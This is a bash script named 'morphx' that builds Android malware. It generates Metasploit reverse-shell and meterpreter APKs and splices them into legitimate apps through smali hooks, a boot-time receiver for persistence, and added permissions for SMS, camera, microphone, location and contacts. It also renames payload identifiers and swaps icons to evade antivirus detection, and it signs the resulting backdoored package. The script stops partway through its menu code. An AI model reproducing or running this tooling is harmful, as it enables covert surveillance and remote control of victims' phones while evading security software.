morphx

#!/usr/bin/env bash

#Colors
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
Reset="${Escape}[0m";
# Check root
[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo  $red "[*] You must be root to run the script"; echo ; exit 1; }
clear
# check internet 
function checkinternet() 
{
  ping -c 1 google.com > /dev/null 2>&1
  if [[ "$?" != 0 ]]
  then
    echo -e $yellow "[*] Checking For Internet: ${RedF}FAILED"
    echo
    echo -e $red "[*] This Script Needs An Active Internet Connection"
    echo
    echo -e $yellow "[*] Morphx Exit"
    echo && sleep 2
    exit
  else
    echo -e $yellow "[*] Checking For Internet: ${LighGreenF}CONNECTED"
  fi
}
checkinternet
sleep 2
#Define options
path=`pwd`
lanip=`hostname -I`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
ver="v0.1"
APKTOOL="$path/input/apktool.jar"
ICON_DIR="$path/input"
ORIGINAL_DIR="$path/input"

VAR1=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # smali dir renaming
VAR2=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # smali dir renaming
VAR3=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # Payload.smali renaming
VAR4=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # Pakage name renaming 1
VAR5=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # Pakage name renaming 2
VAR6=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # Pakage name renaming 3
VAR7=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # New name for word 'payload'
VAR8=$(sort -R /usr/share/dict/words | head -1 | cut -d"'" -f1) # New name for word 'metasploit'

perms='   <uses-permission android:name="android.permission.INTERNET"/>\n    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>\n    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>\n    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>\n    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>\n    <uses-permission android:name="android.permission.SEND_SMS"/>\n    <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n    <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n    <uses-permission android:name="android.permission.CALL_PHONE"/>\n    <uses-permission android:name="android.permission.READ_CONTACTS"/>\n    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>\n    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>\n    <uses-permission android:name="android.permission.CAMERA"/>\n    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>\n    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>\n    <uses-permission android:name="android.permission.SET_WALLPAPER"/>\n    <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>\n    <uses-permission android:name="android.permission.WAKE_LOCK"/>\n    <uses-permission android:name="android.permission.READ_SMS"/>'
echo ""
sleep 1
# spinner for Metasploit Generator
spinlong ()
{
    bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}
# detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... "
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Morphx  :)"
exit
}
#detect system
echo -e "\e[33m[*] Your System is \e[1;32m$(cat /etc/issue.net)\e[0m"
#check dependencies existence
echo -e $yellow "" 
echo "[*] Checking Installed Dependencies" 
echo "                                       " 
# check if metasploit-framework is installed
which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[✔] Metasploit-Framework..............${LighGreenF}[Found]"
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e $red "[X] Metasploit-Framework  -> ${RedF}Not Found "
echo -e $yellow "[!] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[✔] Installation Complete"
which msfconsole > /dev/null 2>&1
sleep 2
fi

#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[✔] Aapt..............................${LighGreenF}[Found]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[X] Aapt -> ${RedF}Not Found! "
sleep 2
echo -e $yellow "[!] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[✔] Installation Complete"
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[✔] Apktool...........................${LighGreenF}[Found]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[X] Apktool -> ${RedF}Not Found! "
sleep 2
echo -e $yellow "[!] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[✔] Installation Complete"
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[✔] Zipalign..........................${LighGreenF}[Found]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[X] Zipalign -> ${RedF}Not Found! "
sleep 2
echo -e $yellow "[!] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[✔] Installation Complete "
which zipalign > /dev/null 2>&1
fi
directory="$path/output"
if [ ! -d "$directory" ]; then
	echo -e $yellow "[*] Creating the Output Directory..."
	mkdir $directory
        sleep 3
fi

#function lhost
function get_lhost() 
{
        echo -e "\e[1;32m☢ SET LHOST ☢\e[0m"
        echo ""
        echo -e "\e[1;33m[*] Local IP:\e[0m $lanip" 👈 👉 "\e[1;33m [*] Public IP: \e[0m $publicip"
        echo ""
        read -p $'\e[1;33m[*] Enter your LHOST:\e[0m \e[1;37m' LHOST && echo -e '\e[0m'

}
#function lport
function get_lport() 
{
        echo -e "\e[1;32m☢ SET LPORT ☢\e[0m"
        echo ""
        read -p $'\e[1;33m[*] Enter your LPORT:\e[0m \e[1;37m' LPORT
}
#function payload
function get_payload()
{
        echo -e "\e[1;32m☢ PAYLOAD LIST ☢\e[0m"
        echo ""
        echo -e "\e[1;37m1) android/meterpreter/reverse_https\e[0m"
        echo ""
        echo -e "\e[1;37m2) android/meterpreter/reverse_http\e[0m"
        echo ""
        echo -e "\e[1;37m3) android/meterpreter/reverse_tcp\e[0m"
        echo ""
        echo -e "\e[1;37m4) android/shell/reverse_https\e[0m"
        echo ""
        echo -e "\e[1;37m5) android/shell/reverse_tcp\e[0m"
        echo ""
while true; do
        read -p $'\e[1;33m[*] Enter Payload Number:\e[0m \e[1;37m' choice && echo -e '\e[0m'
case $choice in
    1)
        PAYLOAD="android/meterpreter/reverse_https"
        break
        ;;
    2)
        PAYLOAD="android/meterpreter/reverse_http"
        break
        ;;
    3)
        PAYLOAD="android/meterpreter/reverse_tcp"
        break
        ;;
    4)
        PAYLOAD="android/shell/reverse_https"
        break
        ;;
    5)
        PAYLOAD="android/shell/reverse_tcp"
        break
        ;;
    *)
        echo -e $red "[X] Invalid Choice. Please Try Again"
        echo ""
        ;;
        
esac
done
}
#function name
function payload_name()
{
        echo -e "\e[1;32m☢ PAYLOAD NAME ☢\e[0m"
        echo ""
        read -p $'\e[1;33m[*] Enter Payload Name (Example: Virus):\e[0m \e[1;37m' apk_name && echo -e '\e[0m'
}
#function original apk
function orig_apk()
{
        echo -e "\e[1;32m☢ ORIGINAL APK ☢\e[0m"
        echo ""
        while true; do
        read -p $'\e[1;33m[*] Enter Original APK:\e[0m \e[1;37m' orig && echo -e '\e[0m'
        original_path="$ORIGINAL_DIR/$orig"
  if [ ! -f "$original_path" ]; then
    echo -e $red "[X] APK $orig Not Found. Please Try Again."
    echo ""
    else
            break
  fi
    done
}
#function change icon
function change_icon()
{
        echo -e "\e[1;32m☢ CHOOSE PNG ICON ☢\e[0m"
        echo ""
        while true; do
        read -p $'\e[1;33m[*] Enter Icon Filename:\e[0m \e[1;37m' iconos && echo -e '\e[0m'
        icon_path="$ICON_DIR/$iconos"
  if [ ! -f "$icon_path" ]; then
    echo -e $red "[X] Icon $iconos Does Not Exist. Please Try Again."
    echo ""
    else
    break
  fi
  done
}

#function generate payload
function gen_payload()
{
 echo -e $yellow ""
 echo "[*] Generating APK Payload"
 spinlong
 msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
 echo -e $yellow ""
 echo "[*] Embedding MSF Payload in Orginal APK..."
 spinlong
 msfvenom -x $original_path -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $path/$apk_name.apk > /dev/null 2>&1
 status=$?
 spinlong
 sleep 5
 echo ""
 if [ $status -eq 0 ]; then
 echo -e $yellow "[*] Done."
 fi
 spinlong
 echo 
}

#function update apktool
function up_apktook()
{
 echo -e $yellow
 echo "[*] Removing 1.apk Framework File..."
 spinlong
 apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
 echo -e $yellow ""
 echo "[*] Decompiling Payload APK..."
 spinlong
 java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
 rm $apk_name.apk
}
function apk_comp()
{
 echo -e $yellow ""
 echo "[*] Rebuilding APK File..."
 spinlong
 java -jar $APKTOOL b $path/payload -o virus.apk > /dev/null 2>&1
 rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
 echo -e $yellow ""
 echo "[*] Decompiling Original APK..."
 spinlong
 java -jar $APKTOOL d -f -o $path/original $original_path > /dev/null 2>&1
}
function apk_comp1()
{
 echo -e $yellow ""
 echo "[*] Rebuilding Backdoored APK..."
 spinlong
 java -jar $APKTOOL b $path/original -o virus.apk > /dev/null 2>&1
 rm -r payload > /dev/null 2>&1
 rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo -e $red "【X】 Failed to Rebuild Backdoored APK."
   exit $rc
 fi
}
function error0()
{
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo -e $red "【X】 An Error Occured .PLease Try Again."
   exit $rc
 fi
}
# function adding permission
function perms()
{
 echo -e $yellow ""
 echo "[*] Adding Permissions and Hook Smali"
 spinlong
 package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
 tmp=$package_name
 sed -i "5i\ $perms" $path/original/AndroidManifest.xml
 rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
 sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ];then
  app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
  app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
  tmp=$app_name
  sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
  cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
  amanifest="    </application>"
  boot_cmp='        <receiver android:label="MainBroadcastReceiver" android:name="'$app_dash.stage.MainBroadcastReceiver'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$app_dash.stage.MainService'"/></application>'
  sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1    
 fi
 amanifest="    </application>"
 boot_cmp='        <receiver android:label="MainBroadcastReceiver" android:name="'$package_dash.stage.MainBroadcastReceiver'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$package_dash.stage.MainService'"/></application>'
 sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1    
 android_nam=$tmp
}
# functions hook smali
function hook_smalies()
{
 launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 if [ $android_name ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
 elif [ ! -e $android_activity ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
  rc=$?
  if [ $rc != 0 ]; then
    spinlong
    echo -e $red ""
    echo "[x] Cannot Find : $android_activity.smali"
    echo "[*] Try Another ..."
    spinlong
    sleep 2
    echo
    echo "##################################################################"
    echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
    hook_num=`grep -n "    return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
    echo "In line:$hook_num"
    echo "##################################################################"
    starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
    sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
  fi 
 fi
}
#function stealth
function stealth()
{
 echo -e $yellow ""
 echo "[*] Activating Stealth Mode..."
 spinlong
 if [ -f "$path/input/MainActivity.smali" ]; then
 rm "$path/payload/smali/com/metasploit/stage/MainActivity.smali" 2>&1
 sleep 2
 cp $path/input/MainActivity.smali  $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
     else
     echo -e $red "[X] MainActivity Not Found"
     exit 1
fi
}
#function flagged by av & updating smalies
function flagg()
{
 echo -e $yellow ""
 echo "[*] Scrubbing the Payload Contents to Avoid AV Signatures..."
 spinlong
 mv payload/smali/com/metasploit payload/smali/com/$VAR1
 mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
 mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sleep 2
 if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
    echo
    echo -e $red "[ X ] An Error Occured . Please Upgrade Your Distro .."
    exit 1
 fi
 sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
 sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
 sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
 sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
 sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
 sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
 sed -i '/WRITE_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' payload/AndroidManifest.xml
}
function flagg_original()
{
 echo -e $yellow ""
 echo "[*] Scrubbing the Payload Contents to Avoid AV Signatures..."
 spinlong
 rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
 mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
 mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
 mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
 mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
 sleep 2
 if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
    echo
    echo -e $red "[ X ] An Error Occured . Please Upgrade Your Distro .."
   
    exit 1
 fi
 echo -e $yellow ""
 echo "[*] Adding Permissions and Hook Smali"
 spinlong
 sed -i "5i\ $perms" $path/original/AndroidManifest.xml
 package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
 tmp=$package_name
 sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ];then
  app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
  app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
  tmp=$app_name
  sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
  amanifest="    </application>"
  boot_cmp='        <receiver android:label="'$VAR2'" android:name="'$app_dash.$VAR1.$VAR2'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$app_dash.$VAR1.$VAR3'"/></application>'
  sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
 fi
 amanifest="    </application>"
 boot_cmp='        <receiver android:label="'$VAR2'" android:name="'$package_dash.$VAR1.$VAR2'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$package_dash.$VAR1.$VAR3'"/></application>'
 sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
 android_nam=$tmp
 launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
  if [ $android_name ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
 elif [ ! -e $android_activity ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
  rc=$?
  if [ $rc != 0 ]; then
    spinlong
    echo -e $red ""
    echo =e $red "[x] Cannot Find : $android_activity.smali"
    echo "[*] Try Another ..."
    spinlong
    sleep 2
    echo
    echo "##################################################################"
    echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
    hook_num=`grep -n "    return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
    echo "In line:$hook_num"
    echo "##################################################################"
    starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
    sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
  fi
 fi
}
# function change name and icon
function merge_name_ico()
{
 echo -e $yellow ""
 echo "[*] Changing Name and Payload Icon"
 spinlong
 label='    <application android:label="@string/app_name">'
 label1='    <application android:label="@string/app_name" android:icon="@drawable/main_icon">'
 sed -i 's|<application android:label="@string/app_name">|<application android:label="@string/app_name" android:icon="@drawable/icon" >|g' $path/payload/AndroidManifest.xml 2>&1

mkdir $path/payload/res/drawable-ldpi-v4 $path/payload/res/drawable-mdpi-v4 $path/payload/res/drawable-hdpi-v4 $path/payload/res/drawable-xxhdpi-v4 $path/payload/res/drawable-xhdpi-v4;
     convert -resize 144x144 $icon_path $path/payload/res/drawable-xxhdpi-v4/icon.png;
     convert -resize 96x96 $icon_path $path/payload/res/drawable-xhdpi-v4/icon.png;
     convert -resize 72x72 $icon_path $path/payload/res/drawable-hdpi-v4/icon.png;
     convert -resize 48x48 $icon_path $path/payload/res/drawable-mdpi-v4/icon.png;
     convert -resize 36x36 $icon_path $path/payload/res/drawable-ldpi-v4/icon.png;
     sleep 3
}
#function signing apk
function sign()
{
 echo -e $yellow ""
 echo "[*] Checking For ~/.android/debug.keystore For Signing..."
 spinlong
 if [ ! -f ~/.android/debug.keystore ]; then
     echo -e $red ""
     echo " [ X ] Debug Key Not Found. Generating One Now..."
     spinlong
     if [ ! -d "~/.android" ]; then
       mkdir ~/.android > /dev/null 2>&1
     fi
     echo -e $lightgreen ""
     keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000 
 fi
 spinlong
 echo -e $yellow ""
 echo "[*] Attempting to Sign the Package with Your Android Debug Key"
 spinlong
 jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA virus.apk androiddebugkey > /dev/null 2>&1
 echo -e $yellow 
 echo "[*] Verifying Signed Artifacts..."
 spinlong
 jarsigner -verify -certs virus.apk > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo -e $red "[!] Failed to Verify Signed Artifacts"
   exit $rc
 fi
 echo -e $yellow
 echo "[*] Aligning Recompiled APK..."
 spinlong
 zipalign 4 virus.apk $apk_name.apk 2>&1
 rc=$?
 echo -e $yellow
 echo "[*] Done."
 spinlong
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo -e $red "[!] Failed to Align Recompiled APK"
   exit $rc
 fi
 rm virus.apk > /dev/null 2>&1
}

#main menu
function main()
{
clear
    while :
    do

        echo -e ${lightgreen} ""
        echo "              __  ___                  __             "
        echo "             /  |/  /___   ____ ___   / /  __ __       "
        echo "            / /|_/ // _ \ / __// _ \ / _ \ \ \ /        "
        echo "           /_/  /_/ \___//_/  / .__//_//_//_\_\         "
        echo "          /_/                /_/                 $ver "
        echo -e "\e[1;37m                    Coded by Tunisian HxRofo          \e[0m"          
        echo "                                                      "
        echo -e "${Escape}"  # Reset color
        echo -e $green ""
        echo "[1] SIMPLE MSF PAYLOAD                                     "
        echo "[2] BACKDOOR ANOTHER APP [METHOD 1]              "
        echo "[3] BACKDOOR ANOTHER APP [METHOD 2]              "
        echo "[4] BYPASS AV (ICON CHANGE)                 "
        echo "[5] STEALTHY PERSISTENCE                "
        echo "[x] EXIT                                        "
        read -p "[✔] Select>: " option
        echo
        
        case "$option" in 
            1)  echo -e $lightgreen "[✔] SIMPLE MSF PAYLOAD"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                spinlong
                gen_payload
                mv $apk_name.apk $path/output > /dev/null 2>&1
                error0
                sleep 2
                echo ""
                echo -e $yellow "[*] Done"
                spinlong
                sleep 3
                echo
                clear
                ;;
            2)  echo -e $lightgreen "[✔] BACKDOOR ANOTHER APP (METHOD 1)"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                echo
                orig_apk
		spinlong
		gen_payload
		spinlong
		up_apktook
		apk_decomp1
		spinlong
		apk_decomp
		flagg_original
		spinlong
		apk_comp1
		spinlong
		sign
		echo
                mv $apk_name.apk $path/output > /dev/null 2>&1
                error
                sleep 2
                echo ""
                clear
                ;;
            3)  echo -e $lightgreen "[✔] BACKDOOR ANOTHER APP (METHOD 2)"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                echo
                orig_apk
                spinlong
                up_apktook
                embed_payload
                echo 
                mv $apk_name.apk $path/output > /dev/null 2>&1
                error
                sleep 2
                echo ""
                clear
                ;;

            4)  echo -e $lightgreen "[✔] BYPASS AV (ICON CHANGE)"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                change_icon
                spinlong
                gen_payload
                spinlong
                apk_decomp
                flagg
                merge_name_ico
                spinlong
                apk_comp
                spinlong
                sign     
                                          
                echo
